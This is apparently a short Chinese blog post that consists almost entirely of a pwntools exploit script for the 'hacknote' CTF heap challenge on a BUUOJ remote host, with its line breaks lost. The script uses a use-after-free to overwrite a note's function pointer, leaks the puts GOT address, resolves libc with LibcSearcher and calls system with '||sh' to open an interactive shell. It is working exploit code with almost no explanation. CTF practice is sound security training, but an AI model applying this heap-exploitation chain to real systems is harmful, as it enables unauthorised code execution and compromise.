以前做过的题目
from pwn import*from LibcSearcher import*context.log_level = 'debug'#context.arch = 'amd64'#io =process('./hacknote')io = remote("node4.buuoj.cn",27107)elf = ELF('./hacknote')#libc = ELF('libc-2.23.so')def debug():gdb.attach(io)pause()def creat(size,value):io.recvuntil('Your choice :')io.sendline('1')io.recvuntil('Note size :')io.sendline(str(size))io.recvuntil('Content :')io.sendline(value)def free(id):io.recvuntil('Your choice :')io.sendline('2')io.recvuntil('Index :')io.sendline(str(id))def show(i):io.recvuntil('Your choice :')io.sendline('3')io.recvuntil('Index :')io.sendline(str(i))puts_got = elf.got['puts']creat(0x10,'aaaa')creat(0x10,"bbbb")free(1)free(0)payload=""payload = p32(0x080485fb)+p32(puts_got)creat(0x8,payload)show(1)puts_addr =u32(io.recv(4))log.success("puts_addr:"+hex(puts_addr))#debug()free(2)libc=LibcSearcher('puts',puts_addr)libc_base = puts_addr - libc.dump('puts')system_addr = libc_base + libc.dump('system')log.success('system:{}'.format(hex(system_addr)))binsh_addr = libc_base + libc.dump('str_bin_sh')payload = p32(system_addr)+'||sh'creat(0x8,payload)show(1)io.interactive()
若有收获,就点个赞吧
0 人点赞
